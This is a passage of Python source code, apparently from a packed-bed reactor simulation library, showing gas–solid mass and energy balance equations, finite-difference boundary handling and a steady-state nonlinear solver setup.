# hs = heat_transfer_coefficient_shell(T,Tv,Pv,Pa);
# overall heat transfer coefficient [J/m2.s.K]
# U = overall_heat_transfer_coefficient(hfs,kwall,do,di,L);
# heat transfer coefficient - permeate side [J/m2.s.K]
# NOTE
# cooling temperature [K]
Tm = ExHe['MeTe']
# overall heat transfer coefficient [J/s.m2.K]
U = ExHe['OvHeTrCo']
# heat transfer area over volume [m^2/m^3]
a = ExHe['EfHeTrAr']
# heat transfer parameter [W/m^3.K] | [J/s.m^3.K]
# Ua = U*a
# external heat [kJ/m^3.s]
Qm = rmtUtil.calHeatExchangeBetweenReactorMedium(
Tm, T_ReVa, U, a, 'kJ/m^3.s')
# NOTE
# # mass transfer between
# for i in range(compNo):
# ### gas phase ###
# # mass balance (forward difference)
# # concentration [kmol/m^3]
# # central
# Ci_c = SpCoi_z[i][z]
# # concentration in the catalyst surface [kmol/m^3]
# # CosSpi_cat
# # dimensionless analysis: real value
# Ci_f = SpCoi0[i] if MODEL_SETTING['GaMaCoTe0'] != "MAX" else np.max(
# SpCoi0)
# # inward flux [kmol/m^2.s]
# MoFli_z[i] = MaTrCo[i]*Ci_f*(Ci_c - CosSpi_cat_DiLeVa[i])
# # total mass transfer between gas and solid phases [kmol/m^3]
# ToMaTrBeGaSo_z = np.sum(MoFli_z)*SpSuAr
# NOTE
# velocity from global concentration
# check BC
# if z == 0:
# # BC1
# constT_BC1 = (GaThCoEff)/(MoFl*GaCpMeanMix/1000)
# # next node
# T_f = T_z[z+1]
# # previous node
# T_b = (T0*dz + constT_BC1*T_f)/(dz + constT_BC1)
# elif z == zNo - 1:
# # BC2
# # previous node
# T_b = T_z[z - 1]
# # next node
# T_f = 0
# else:
# # interior nodes
# T_b = T_z[z-1]
# # next node
# T_f = T_z[z+1]
# dxdt_v_T = (T_z[z] - T_b)/dz
# # CoSp x 1000
# # OvR x 1000
# dxdt_v = (1/(CoSp*1000))*((-SuGaVe/CONST.R_CONST) *
# ((1/T_z[z])*dxdt_P - (P_z[z]/T_z[z]**2)*dxdt_v_T) - ToMaTrBeGaSo_z*1000)
# velocity [forward value] is updated
# backward value of temp is taken
# dT/dt will update the old value
# FIXME
# v_z[z+1] = dxdt_v*dz + v_z[z]
# v_z[z+1] = v
# FIXME
v_z[z+1] = v_z[z]
# dimensionless analysis
v_z_DiLeVa = rmtUtil.calDiLessValue(v_z[z+1], vf)
# NOTE
# diff/dt
# dxdt = []
# matrix
# dxdtMat = np.zeros((varNo, zNo))
# bulk temperature [K]
T_c = T_z[z]
# REVIEW
# gas-solid interface BC
# concentration [m/s]*[m^2/s]=[1/m]
# betaC = PaRa*(MaTrCo/SoDiiEff)
# temperature
# betaT = -1*((HeTrCo*PaRa)/SoThCoEff)
# universal index [j,i]
# UISet = z*(rNo + 1)
# NOTE
# concentration [mol/m^3]
for i in range(compNo):
# concentration [kmol/m^3]
# central
Ci_c = SpCoi_z[i][z]
# REVIEW
### solid phase ###
# bulk concentration [kmol/m^3]
# Ci_c
# species concentration at different points of particle radius [rNo]
# [Cs[3], Cs[2], Cs[1], Cs[0]]
_Cs_r = CosSpi_r[:, i].flatten()
# Cs[0], Cs[1], ...
_Cs_r_Flip = np.flip(_Cs_r)
# dimensionless analysis
# beta
# const
_alpha = rf/GaDii0[i]
_beta = MaTrCo[i]/GaDii_DiLeVa[i]
_Cs_r_interface = _alpha*_beta
_Ri = (1/SoMaDiTe0[i])*(1 - CaPo)*ri_r[:, i]
# updated concentration gas-solid interface
# shape(rNo,1)
_Cs_r_Updated = OrCoCatParticleClassSet.CalUpdateYnSolidGasInterface(
_Cs_r, Ci_c, _Cs_r_interface)
# # dC/dt list
dCsdti = OrCoCatParticleClassSet.buildOrCoMatrix(
_Cs_r_Updated, SoDiiEff_DiLe[i], _Ri)
# const
_const1 = CaPo*(rf**2/GaDii0[i])
_const2 = 1/_const1
#
for r in range(rNo):
# update
dxdtMat[i][r+1][z] = _const2*dCsdti[r]
# concentration [kmol/m^3]
# central
# Ci_c = SpCoi_z[i][z]
# concentration in the catalyst surface [kmol/m^3]
CosSpi_cat_gas = _Cs_r_Updated[-1]
# dimensionless analysis: real value
Ci_f = SpCoi0[i] if MODEL_SETTING['GaMaCoTe0'] != "MAX" else np.max(
SpCoi0)
# inward flux [kmol/m^2.s]
MoFli_z[i] = MaTrCo[i]*Ci_f*(Ci_c - CosSpi_cat_gas)
# REVIEW
### gas phase ###
# check BC
if z == 0 and solverMeshSet is True:
# NOTE
# BC1 (normal)
BC1_C_1 = PeNuMa0[i]*dz
BC1_C_2 = 1/BC1_C_1
# forward
Ci_f = SpCoi_z[i][z+1]
Ci_ff = SpCoi_z[i][z+2]
# backward
# GaDii_DiLeVa = 1
Ci_0 = 1 if MODEL_SETTING['GaMaCoTe0'] != "MAX" else SpCoi0[i]/np.max(
SpCoi0)
Ci_b = (Ci_0 + BC1_C_2*Ci_f)/(BC1_C_2 + 1)
Ci_bb = 0
# function value
dFdz_C = [Ci_b, Ci_c, Ci_f]
d2Fdz2_C = [Ci_bb, Ci_b, Ci_c, Ci_f, Ci_ff]
# dFdz
dCdz = FiDiDerivative1(dFdz_C, dz, DIFF1_C_SET)
# d2Fdz2
d2Cdz2 = FiDiDerivative2(d2Fdz2_C, dz, DIFF2_C_SET_BC1)
elif z == 0 and solverMeshSet is False:
# NOTE
# BC1 (dense)
# i=0 is discretized based on inlet
# i=1
BC1_C_1 = PeNuMa0[i]*dzs[z]
BC1_C_2 = 1/BC1_C_1
# forward
Ci_f = SpCoi_z[i][z+1]
Ci_ff = SpCoi_z[i][z+2]
# backward
# GaDii_DiLeVa = 1
Ci_0 = 1 if MODEL_SETTING['GaMaCoTe0'] != "MAX" else SpCoi0[i]/np.max(
SpCoi0)
Ci_b = (Ci_0 + BC1_C_2*Ci_f)/(BC1_C_2 + 1)
Ci_bb = 0
# function value
dFdz_C = [Ci_b, Ci_c, Ci_f]
d2Fdz2_C = [Ci_bb, Ci_b, Ci_c, Ci_f, Ci_ff]
# REVIEW
### uniform nodes ###
# dFdz
dCdz = FiDiDerivative1(dFdz_C, dzs[z], DIFF1_C_SET)
# d2Fdz2
# d2Cdz2 = FiDiDerivative2(d2Fdz2_C, dzs[z], DIFF2_C_SET_BC1)
### non-uniform nodes ###
# R value
_zR_b = 0
_zR_c = dzs[z]/dzs[z-1]
# dCdz = FiDiNonUniformDerivative1(
# dFdz_C, dzs[z], DIFF1_C_SET, zR[z])
# d2Fdz2
d2Cdz2 = FiDiNonUniformDerivative2(
d2Fdz2_C, dzs[z], DIFF2_C_SET_BC1, _zR_c)
elif (z > 0 and z < zNoNoDense) and solverMeshSet is False:
# NOTE
# dense section
# i=2,...,zNoNoDense-1
# forward
Ci_f = SpCoi_z[i][z+1]
Ci_ff = SpCoi_z[i][z+2]
# backward
Ci_b = SpCoi_z[i][z-1]
Ci_bb = SpCoi_z[i][z-2]
# function value
dFdz_C = [Ci_bb, Ci_b, Ci_c, Ci_f, Ci_ff]
d2Fdz2_C = [Ci_bb, Ci_b, Ci_c, Ci_f, Ci_ff]
# REVIEW
### non-uniform nodes ###
# R value
_zR_b = dzs[z-2]/dzs[z-1]
_zR_c = dzs[z]/dzs[z-1]
#
dCdz = FiDiNonUniformDerivative1(
dFdz_C, dzs[z], DIFF1_C_SET, _zR_b)
# d2Fdz2
d2Cdz2 = FiDiNonUniformDerivative2(
d2Fdz2_C, dzs[z], DIFF2_C_SET_G, _zR_c)
elif z == zNo - 1:
# NOTE
# BC2
# backward
Ci_b = SpCoi_z[i][z-1]
Ci_bb = SpCoi_z[i][z-2]
# forward difference
Ci_f = Ci_b
Ci_ff = 0
# function value
dFdz_C = [Ci_b, Ci_c, Ci_f]
d2Fdz2_C = [Ci_bb, Ci_b, Ci_c, Ci_f, Ci_ff]
# dFdz
dCdz = FiDiDerivative1(dFdz_C, dz, DIFF1_C_SET)
# d2Fdz2
d2Cdz2 = FiDiDerivative2(d2Fdz2_C, dz, DIFF2_C_SET_BC2)
else:
# NOTE
# normal sections
# interior nodes
# forward
Ci_f = SpCoi_z[i][z+1]
Ci_ff = SpCoi_z[i][z+2] if z < zNo-2 else 0
# backward
Ci_b = SpCoi_z[i][z-1]
Ci_bb = SpCoi_z[i][z-2]
# function value
dFdz_C = [Ci_b, Ci_c, Ci_f]
d2Fdz2_C = [Ci_bb, Ci_b, Ci_c, Ci_f, Ci_ff]
# REVIEW
### uniform nodes ###
# dFdz
dCdz = FiDiDerivative1(dFdz_C, dz, DIFF1_C_SET)
# d2Fdz2
d2Cdz2 = FiDiDerivative2(d2Fdz2_C, dz, DIFF2_C_SET_G)
# REVIEW
# cal differentiate
# backward difference
# dCdz = (Ci_c - Ci_b)/(1*dz)
# convective term
_convectiveTerm = -1*v_z_DiLeVa*dCdz
# central difference for dispersion
# d2Cdz2 = (Ci_b - 2*Ci_c + Ci_f)/(dz**2)
# dispersion term [kmol/m^3.s]
_dispersionFluxC = (BeVoFr*GaDii_DiLeVa[i]/PeNuMa0[i])*d2Cdz2
# concentration in the catalyst surface [kmol/m^3]
# CosSpi_cat
# inward flux [kmol/m^2.s]
# MoFli_z[i] = MaTrCo[i]*(Ci_c - CosSpi_cat[i])
_inwardFlux = (1/GaMaCoTe0[i])*MoFli_z[i]*SpSuAr
# mass balance
# convective, dispersion, inward flux
# const
_const1 = BeVoFr*(zf/vf)
_const2 = 1/_const1
#
dxdt_F = _const2*(_convectiveTerm +
_dispersionFluxC - _inwardFlux)
dxdtMat[i][0][z] = dxdt_F
# NOTE
# energy balance
# bulk temperature [K]
# T_c
# T_c = T_z[z]
# REVIEW
### solid phase ###
# temperature at different points of particle radius [rNo]
# Ts[3], Ts[2], Ts[1], Ts[0]
_Ts_r = Ts_r.flatten()
# _Ts_r
# T[n], T[n-1], ..., T[0] => T[0],T[1], ...
_Ts_r_Flip = np.flip(_Ts_r)
# dC/dt list
# convert
# [J/s.m.K] => [kJ/s.m.K]
SoThCoEff_Conv = CaPo*SoThCoMix0/1000
# OvHeReT [kJ/m^3.s]
OvHeReT_Conv = -1*OvHeReT
# HeTrCo [J/m^2.s.K] => [kJ/m^2.s.K]
HeTrCo_Conv = HeTrCo/1000
# loop vars
_alpha = rf/SoThCoEff_Conv
_beta = -1*HeTrCo_Conv/SoThCoEff_DiLeVa
_Ts_r_interfaceVar = _alpha*_beta
_H = (1/SoHeDiTe0)*(1 - CaPo)*OvHeReT_Conv
# T[n], T[n-1], ..., T[0]
# updated temperature gas--solid interface
_Ts_r_Updated = OrCoCatParticleClassSet.CalUpdateYnSolidGasInterface(
_Ts_r, T_c, _Ts_r_interfaceVar)
# dTs/dt list
dTsdti = OrCoCatParticleClassSet.buildOrCoMatrix(
_Ts_r_Updated, SoThCoEff_DiLeVa, _H)
# const
_const1 = SoCpMeanMixEff_ReVa*Tf/SoHeDiTe0
_const2 = 1/_const1
#
for r in range(rNo):
# update
dxdtMat[indexT][r+1][z] = _const2[r]*dTsdti[r]
# updated temperature in the gas-solid interface
Ts_r_cat_gas = _Ts_r_Updated[-1]
# REVIEW
### gas phase ###
# check BC
if z == 0 and solverMeshSet is True:
# BC1
BC1_T_1 = PeNuHe0*dz
BC1_T_2 = 1/BC1_T_1
# forward
T_f = T_z[z+1]
T_ff = T_z[z+2]
# backward
# GaDe_DiLeVa, GaCpMeanMix_DiLeVa, v_z_DiLeVa = 1
# T*[0] = (T0 - Tf)/Tf
T_0 = 0
T_b = (T_0 + BC1_T_2*T_f)/(BC1_T_2 + 1)
T_bb = 0
# function value
dFdz_T = [T_b, T_c, T_f]
d2Fdz2_T = [T_bb, T_b, T_c, T_f, T_ff]
# dFdz
dTdz = FiDiDerivative1(dFdz_T, dz, DIFF1_T_SET)
# d2Fdz2
d2Tdz2 = FiDiDerivative2(d2Fdz2_T, dz, DIFF2_T_SET_BC1)
elif z == 0 and solverMeshSet is False:
# BC1
BC1_T_1 = PeNuHe0*dzs[z]
BC1_T_2 = 1/BC1_T_1
# forward
T_f = T_z[z+1]
T_ff = T_z[z+2]
# backward
# GaDe_DiLeVa, GaCpMeanMix_DiLeVa, v_z_DiLeVa = 1
# T*[0] = (T0 - Tf)/Tf
T_0 = 0
T_b = (T_0 + BC1_T_2*T_f)/(BC1_T_2 + 1)
T_bb = 0
# function value
dFdz_T = [T_b, T_c, T_f]
d2Fdz2_T = [T_bb, T_b, T_c, T_f, T_ff]
# REVIEW
### uniform nodes ###
# dFdz
dTdz = FiDiDerivative1(dFdz_T, dzs[z], DIFF1_T_SET)
# d2Fdz2
# d2Tdz2 = FiDiDerivative2(d2Fdz2_T, dz, DIFF_T_SET_BC1)
# REVIEW
### non-uniform nodes ###
# R value
_zR_b = 0
_zR_c = dzs[z]/dzs[z-1]
# d2Fdz2
d2Tdz2 = FiDiNonUniformDerivative2(
d2Fdz2_T, dzs[z], DIFF2_T_SET_G, _zR_c)
elif (z > 0 and z < zNoNoDense) and solverMeshSet is False:
# NOTE
# dense section
# i=2,...,zNoNoDense-1
# forward
T_f = T_z[z+1]
T_ff = T_z[z+2]
# backward
T_b = T_z[z-1]
T_bb = T_z[z-2]
# function value
dFdz_T = [T_bb, T_b, T_c, T_f, T_ff]
d2Fdz2_T = [T_bb, T_b, T_c, T_f, T_ff]
# REVIEW
### non-uniform nodes ###
# R value
_zR_b = dzs[z-2]/dzs[z-1]
_zR_c = dzs[z]/dzs[z-1]
#
dTdz = FiDiNonUniformDerivative1(
dFdz_T, dzs[z], DIFF1_T_SET, _zR_b)
# d2Fdz2
d2Tdz2 = FiDiNonUniformDerivative2(
d2Fdz2_T, dzs[z], DIFF2_T_SET_G, _zR_c)
elif z == zNo - 1:
# BC2
# backward
T_b = T_z[z-1]
T_bb = T_z[z-2]
# forward
T_f = T_b
T_ff = 0
# function value
dFdz_T = [T_b, T_c, T_f]
d2Fdz2_T = [T_bb, T_b, T_c, T_f, T_ff]
# REVIEW
### uniform nodes ###
# dFdz
dTdz = FiDiDerivative1(dFdz_T, dz, DIFF1_T_SET)
# d2Fdz2
d2Tdz2 = FiDiDerivative2(d2Fdz2_T, dz, DIFF2_T_SET_BC2)
else:
# interior nodes
# forward
T_f = T_z[z+1]
T_ff = T_z[z+2] if z < zNo-2 else 0
# backward
T_b = T_z[z-1]
T_bb = T_z[z-2]
# function value
dFdz_T = [T_b, T_c, T_f]
d2Fdz2_T = [T_bb, T_b, T_c, T_f, T_ff]
# REVIEW
### uniform nodes ###
# dFdz
dTdz = FiDiDerivative1(dFdz_T, dz, DIFF1_T_SET)
# d2Fdz2
d2Tdz2 = FiDiDerivative2(d2Fdz2_T, dz, DIFF2_T_SET_G)
# REVIEW
# cal differentiate
# backward difference
# dTdz = (T_c - T_b)/(1*dz)
# convective term
_convectiveTerm = -1*v_z_DiLeVa*GaDe_DiLeVa*GaCpMeanMix_DiLeVa*dTdz
# central difference
# d2Tdz2 = (T_b - 2*T_c + T_f)/(dz**2)
# dispersion flux [kJ/m^3.s]
# _dispersionFluxT = (GaThCoEff*d2Tdz2)*1e-3
_dispersionFluxT = ((1/PeNuHe0)*GaThCoEff_DiLeVa*d2Tdz2)*1
# temperature in the catalyst surface [K]
# Ts_cat
# outward flux [kJ/m^2.s]
_inwardFluxT = HeTrCo*SpSuAr*Tf*(Ts_r_cat_gas - T_c)*1e-3
# total heat transfer between gas and solid [kJ/m^3.s]
_heTrBeGaSoTerm = (1/GaHeCoTe0)*_inwardFluxT
# heat exchange term [kJ/m^3.s] -> [no unit]
_heatExchangeTerm = (1/GaHeCoTe0)*Qm
# convective flux, diffusive flux, enthalpy of reaction, cooling heat
# const
_const1 = GaDe_DiLeVa*GaCpMeanMix_DiLeVa*BeVoFr*(zf/vf)
_const2 = 1/_const1
#
dxdt_T = _const2*(_convectiveTerm + _dispersionFluxT +
_heTrBeGaSoTerm + _heatExchangeTerm)
dxdtMat[indexT][0][z] = dxdt_T
# NOTE
# flat
dxdt = dxdtMat.flatten().tolist()
# print
print(f"time: {t} seconds")
return dxdt
# NOTE
# static heterogenous modeling
def runM9(self, initGuess=[]):
"""
modeling case (dimensionless)
dynamic model
unknowns: Ci, T (dynamic), P, v (static), Cci, Tc (static, for catalyst)
CT, GaDe = f(P, T, n)
numerical method: finite difference
args:
initGuess: initial guess from
"""
# start computation
start = timer()
# solver setting
solverConfig = self.modelInput['solver-config']
solverRootSet = solverConfig['root']
solverIVPSet = solverConfig['ivp']
solverMesh = solverConfig['mesh']
solverMeshSet = True if solverMesh == "normal" else False
# operating conditions
P = self.modelInput['operating-conditions']['pressure']
T = self.modelInput['operating-conditions']['temperature']
# operation time [s]
opT = self.modelInput['operating-conditions']['period']
# process-type
processType = self.modelInput['operating-conditions']['process-type']
# reaction list
reactionDict = self.modelInput['reactions']
reactionList = rmtUtil.buildReactionList(reactionDict)
# number of reactions
reactionListNo = len(reactionList)
# component list
compList = self.modelInput['feed']['components']['shell']
# graph label setting
# labelList = compList.copy()
# labelList.append("Temperature")
# labelList.append("Pressure")
labelList = pltc.makeLabels(
compList, ["Gas Temp"], compList, ["Solid Temp"])
# component no
compNo = len(compList)
indexTemp = compNo
indexPressure = indexTemp + 1
indexVelocity = indexPressure + 1
# label id
labelIndex_ConcGasPhase = 0
labelIndex_TempGasPhase = compNo
labelIndex_ConcSolidPhase = labelIndex_TempGasPhase + 1
labelIndex_TempSolidPhase = labelIndex_ConcSolidPhase + compNo
# reactor spec
ReSpec = self.modelInput['reactor']
# reactor inner diameter [m]
ReInDi = ReSpec['ReInDi']
# reactor length [m]
ReLe = ReSpec['ReLe']
# cross-sectional area [m^2]
CrSeAr = CONST.PI_CONST*(ReInDi ** 2)/4
# particle diameter [m]
PaDi = ReSpec['PaDi']
# bed void fraction - porosity
BeVoFr = ReSpec['BeVoFr']
## inlet values ##
# inlet volumetric flowrate at T,P [m^3/s]
VoFlRa0 = self.modelInput['feed']['volumetric-flowrate']
# inlet species concentration [kmol/m^3]
SpCoi0 = np.array(self.modelInput['feed']['concentration'])
# inlet total concentration [kmol/m^3]
SpCo0 = np.sum(SpCoi0)
# inlet superficial velocity [m/s]
SuGaVe0 = self.modelInput['feed']['superficial-velocity']
# reaction rate expression
reactionRateExpr = self.modelInput['reaction-rates']
# component molecular weight [g/mol]
MoWei = rmtUtil.extractCompData(self.internalData, "MW")
# external heat
ExHe = self.modelInput['external-heat']
# diffusivity coefficient - gas phase [m^2/s]
GaDii0 = self.modelInput['feed']['diffusivity']
# gas viscosity [Pa.s]
GaVii0 = self.modelInput['feed']['viscosity']
# gas mixture viscosity [Pa.s]
GaViMix0 = self.modelInput['feed']['mixture-viscosity']
# thermal conductivity - gas phase [J/s.m.K]
GaThCoi0 = self.modelInput['feed']['thermal-conductivity']
# mixture thermal conductivity - gas phase [J/s.m.K]
GaThCoMix0 = self.modelInput['feed']['mixture-thermal-conductivity']
# REVIEW
# domain length
DoLe = 1
# ramp list
rampList = solverSetting['M9']['rampList']
# orthogonal collocation points in the r direction
rNo = solverSetting['M9']['rNo']
# mesh setting
zMesh = solverSetting['T1']['zMesh']
# number of nodes
zNoNo = zMesh['zNoNo']
# domain length section
DoLeSe = zMesh['DoLeSe']
# mesh refinement degree
MeReDe = zMesh['MeReDe']
# mesh installment
if solverMeshSet is False:
zMeshRes = FiDiMeshGenerator(zNoNo, DoLe, DoLeSe, MeReDe)
# finite difference points
dataXs = zMeshRes['data1']
# dz lengths
dzs = zMeshRes['data2']
# finite difference point number
zNo = zMeshRes['data3']
# R ratio
zR = zMeshRes['data4']
# dz
dz = zMeshRes['data5']
else:
# finite difference points in the z direction
zNo = solverSetting['M9']['zNo']
# length list [reactor length]
dataXs = np.linspace(0, DoLe, zNo)
# element size - dz [m]
dz = DoLe/(zNo-1)
# reset
dzs = []
zR = []
### calculation ###
# mole fraction in the gas phase
MoFri0 = np.array(rmtUtil.moleFractionFromConcentrationSpecies(SpCoi0))
# mixture molecular weight [kg/mol]
MiMoWe0 = rmtUtil.mixtureMolecularWeight(MoFri0, MoWei, "kg/mol")
# gas density [kg/m^3]
GaDe0 = calDensityIG(MiMoWe0, SpCo0*1000)
# heat capacity at constant pressure of mixture Cp [kJ/kmol.K] | [J/mol.K]
# Cp mean list
GaCpMeanList0 = calMeanHeatCapacityAtConstantPressure(compList, T)
# Cp mixture
GaCpMeanMix0 = calMixtureHeatCapacityAtConstantPressure(
MoFri0, GaCpMeanList0)
# thermal diffusivity in the gas phase [m^2/s]
GaThDi = calThermalDiffusivity(
GaThCoMix0, GaDe0, GaCpMeanMix0, MiMoWe0)
# var no (Ci,T)
varNo = compNo + 1
# concentration var no
varNoCon = compNo*zNo
# temperature var no
varNoTemp = 1*zNo
# concentration in solid phase
varNoConInSolidBlock = rNo*compNo
# total number
varNoConInSolid = varNoConInSolidBlock*zNo
# total var no along the reactor length (in gas phase)
varNoT = varNo*zNo
# number of layers
# concentration layer for each component C[m,j,i]
# m: layer, j: row (rNo), i: column (zNo)
# number of layers
noLayer = compNo+1
# var no in each layer
varNoLayer = zNo*(rNo+1)
# total number of vars (Ci,T,Cci,Tci)
varNoLayerT = noLayer*varNoLayer
# concentration var number
varNoCon = compNo*varNoLayer
# number of var rows [j]
varNoRows = rNo+1
# number of var columns [i]
varNoColumns = zNo
# parameters
# component data
reactionListSorted = self.reactionListSorted
# reaction coefficient
reactionStochCoeff = self.reactionStochCoeffList
# standard heat of reaction at 25C [kJ/kmol]
StHeRe25 = np.array(
list(map(calStandardEnthalpyOfReaction, reactionList)))
# REVIEW
# solver setting
# orthogonal collocation method
OrCoClassSet = OrCoClass()
OrCoClassSetRes = OrCoClassSet.buildMatrix()
# NOTE
### dimensionless analysis ###
# concentration [kmol/m^3]
Cif = np.copy(SpCoi0)
# total concentration
Cf = SpCo0
# temperature [K]
Tf = T
# superficial velocity [m/s]
vf = SuGaVe0
# length [m]
zf = ReLe
# diffusivity [m^2/s]
Dif = np.copy(GaDii0)
# heat capacity at constant pressure [J/mol.K] | [kJ/kmol.K]
Cpif = np.copy(GaCpMeanList0)
# mixture heat capacity [J/mol.K] | [kJ/kmol.K]
Cpf = GaCpMeanMix0
# radius
rf = PaDi/2
# gas phase
# mass convective term - (list) [kmol/m^3.s]
_Cif = Cif if MODEL_SETTING['GaMaCoTe0'] != "MAX" else np.repeat(
np.max(Cif), compNo)
GaMaCoTe0 = (vf/zf)*_Cif
# mass diffusive term - (list) [kmol/m^3.s]
GaMaDiTe0 = (1/zf**2)*(_Cif*Dif)
# heat convective term [kJ/m^3.s]
GaHeCoTe0 = (GaDe0*vf*Tf*(Cpf/MiMoWe0)/zf)*1e-3
# heat diffusive term [kJ/m^3.s]
GaHeDiTe0 = (Tf*GaThCoMix0/zf**2)*1e-3
# solid phase
# mass diffusive term - (list) [kmol/m^3.s]
SoMaDiTe0 = (Dif*_Cif)/rf**2
# heat diffusive term [kJ/m^3.s]
SoHeDiTe0 = (GaThCoMix0*Tf/rf**2)*1e-3
### dimensionless numbers ###
# Re Number
ReNu0 = calReNoEq1(GaDe0, SuGaVe0, PaDi, GaViMix0)
# Sc Number
ScNu0 = calScNoEq1(GaDe0, GaViMix0, GaDii0)
# Sh Number (choose method)
ShNu0 = calShNoEq1(ScNu0, ReNu0, CONST_EQ_Sh['Frossling'])
# Prandtl Number
PrNu0 = calPrNoEq1(GaCpMeanMix0, GaViMix0, GaThCoMix0, MiMoWe0)
# Nu number
NuNu0 = calNuNoEq1(PrNu0, ReNu0)
# Strouhal number
StNu = 1
# Peclet number - mass transfer
PeNuMa0 = (vf*zf)/Dif
# Peclet number - heat transfer
PeNuHe0 = (zf*GaDe0*(Cpf/MiMoWe0)*vf)/GaThCoMix0
### transfer coefficient ###
# mass transfer coefficient - gas/solid [m/s]
MaTrCo = calMassTransferCoefficientEq1(ShNu0, GaDii0, PaDi)
# heat transfer coefficient - gas/solid [J/m^2.s.K]
HeTrCo = calHeatTransferCoefficientEq1(NuNu0, GaThCoMix0, PaDi)
# fun parameters
FunParam = {
"compList": compList,
"const": {
"CrSeAr": CrSeAr,
"MoWei": MoWei,
"StHeRe25": StHeRe25,
"GaMiVi": GaViMix0,
"varNo": varNo,
"varNoT": varNoT,
"reactionListNo": reactionListNo,
},
"ReSpec": ReSpec,
"ExHe": ExHe,
"constBC1": {
"VoFlRa0": VoFlRa0,
"SpCoi0": SpCoi0,
"SpCo0": SpCo0,
"P0": P,
"T0": T,
"SuGaVe0": SuGaVe0,
"GaDii0": GaDii0,
"GaThCoi0": GaThCoi0,
"GaVii0": GaVii0,
"GaDe0": GaDe0,
"GaCpMeanMix0": GaCpMeanMix0,
"GaThCoMix0": GaThCoMix0
},
"meshSetting": {
"solverMesh": solverMesh,
"solverMeshSet": solverMeshSet,
"noLayer": noLayer,
"varNoLayer": varNoLayer,
"varNoLayerT": varNoLayerT,
"varNoRows": varNoRows,
"varNoColumns": varNoColumns,
"rNo": rNo,
"zNo": zNo,
"dz": dz,
"dzs": dzs,
"zR": zR,
"zNoNo": zNoNo
},
"solverSetting": {
"dFdz": solverSetting['T1']['dFdz'],
"d2Fdz2": solverSetting['T1']['d2Fdz2'],
"dTdz": solverSetting['T1']['dTdz'],
"d2Tdz2": solverSetting['T1']['d2Tdz2'],
"OrCoClassSetRes": OrCoClassSetRes,
},
"reactionRateExpr": reactionRateExpr
}
# dimensionless analysis parameters
DimensionlessAnalysisParams = {
"Cif": Cif,
"Tf": Tf,
"vf": vf,
"zf": zf,
"Dif": Dif,
"Cpif": Cpif,
"Cpf": Cpf,
"rf": rf,
"GaMaCoTe0": GaMaCoTe0,
"GaMaDiTe0": GaMaDiTe0,
"GaHeCoTe0": GaHeCoTe0,
"GaHeDiTe0": GaHeDiTe0,
"ReNu0": ReNu0,
"ScNu0": ScNu0,
"ShNu0": ShNu0,
"PrNu0": PrNu0,
"PeNuMa0": PeNuMa0,
"PeNuHe0": PeNuHe0,
"MaTrCo": MaTrCo,
"HeTrCo": HeTrCo,
"SoMaDiTe0": SoMaDiTe0,
"SoHeDiTe0": SoHeDiTe0
}
# NOTE
# initial guess set
_initGuessVal = initGuess['dataYs']
_initGuessVal_Concentration = _initGuessVal[:-1]
_initGuessVal_Temperature = _initGuessVal[-1]
initGuessConc_DiLeVa = rmtUtil.calDiLessValue(
_initGuessVal[:-1], np.max(_Cif))
initGuessTemp_DiLeVa = rmtUtil.calDiLessValue(
_initGuessVal[-1], Tf, "TEMP")
# initial guess at t>0 and z>>0
IVMatrixShape = (noLayer, varNoRows, varNoColumns)
IV2D = np.zeros(IVMatrixShape)
# bounds
BMatrixShape = (noLayer, varNoRows, varNoColumns)
BUp2D = np.zeros(BMatrixShape)
BLower2D = np.zeros(BMatrixShape)
# initialize IV2D
# -> concentration [kmol/m^3]
for m in range(noLayer - 1):
for i in range(varNoColumns):
for j in range(varNoRows):
# separate phase
if j == 0:
# gas phase
# 0.5 # SpCoi0[m]/np.max(SpCoi0)
IV2D[m][j][i] = initGuessConc_DiLeVa[m, i]
# set bounds
BUp2D[m][j][i] = 1
BLower2D[m][j][i] = 0
else:
# solid phase
# 0.5 # SpCoi0[m]/np.max(SpCoi0)
IV2D[m][j][i] = initGuessConc_DiLeVa[m, i]
# set bounds
BUp2D[m][j][i] = 1
BLower2D[m][j][i] = 0
# temperature
for i in range(varNoColumns):
for j in range(varNoRows):
# separate phase
if j == 0:
# gas phase
# 0 + 1e-2*varNoColumns # T
IV2D[noLayer - 1][j][i] = initGuessTemp_DiLeVa[i]
# set bounds
BUp2D[noLayer - 1][j][i] = 1
BLower2D[noLayer - 1][j][i] = -1
else:
# solid phase
# 0 + 0.99e-2*varNoColumns # T
IV2D[noLayer - 1][j][i] = initGuessTemp_DiLeVa[i]
# set bounds
BUp2D[noLayer - 1][j][i] = 1
BLower2D[noLayer - 1][j][i] = -1
# flatten IV
IV = IV2D.flatten()
BUp = BUp2D.flatten()
BLower = BLower2D.flatten()
# set bound
setBounds = (BLower, BUp)
# result
dataPack = []
# solver setting
funSet = PackedBedReactorClass.modelEquationM9
paramsSet = (reactionListSorted, reactionStochCoeff,
FunParam, DimensionlessAnalysisParams, processType)
# NOTE
rampListLen = len(rampList)
# ramp nonlinear term
for k in range(rampListLen):
rampSet = rampList[k]
print("rampSet: ", rampSet)
### solve a system of nonlinear algebraic equation ###
if solverRootSet == "fsolve":
sol = optimize.fsolve(funSet, IV, args=(paramsSet, rampSet))
# result
successStatus = True if len(sol) > 0 else False
# all results
# components, temperature layers
dataYs = sol
elif solverRootSet == "root":
# root
# lm, krylov, anderson, hybr, broyden1, linearmixing, diagbroyden, excitingmixing
sol = optimize.root(funSet, IV, args=(
paramsSet, rampSet), method='lm')
# result
successStatus = sol.success
# all results
# components, temperature layers
dataYs = sol.x
elif solverRootSet == "least_squares":
sol = optimize.least_squares(
funSet, IV, bounds=setBounds, args=(paramsSet, rampSet))
# result
successStatus = sol.success
# all results
# components, temperature layers
dataYs = sol.x
# NOTE
# update initial guess
IV = dataYs
# check
if successStatus is False:
raise
else:
# std format
dataYs_Reshaped = np.reshape(
dataYs, (noLayer, varNoRows, varNoColumns))
# -> concentration
dataYs_Concentration_DiLeVa = dataYs_Reshaped[:-1]
# gas phase
_ConcGasPhase_DiLeVa = dataYs_Concentration_DiLeVa[:, 0, :]
# solid phase
_ConcSolidPhase_DiLeVa = dataYs_Concentration_DiLeVa[:, 1:, :]
# -> temperature
dataYs_Temperature_DiLeVa = dataYs_Reshaped[-1] if processType != PROCESS_SETTING['ISO-THER'] else np.repeat(
[[0], [0]], zNo).reshape((varNoRows, varNoColumns))
# gas phase
_TempGasPhase_DiLeVa = dataYs_Temperature_DiLeVa[0, :].reshape(
(1, zNo))
# solid phase
_TempSolidPhase_DiLeVa = dataYs_Temperature_DiLeVa[1:, :]
# sort out
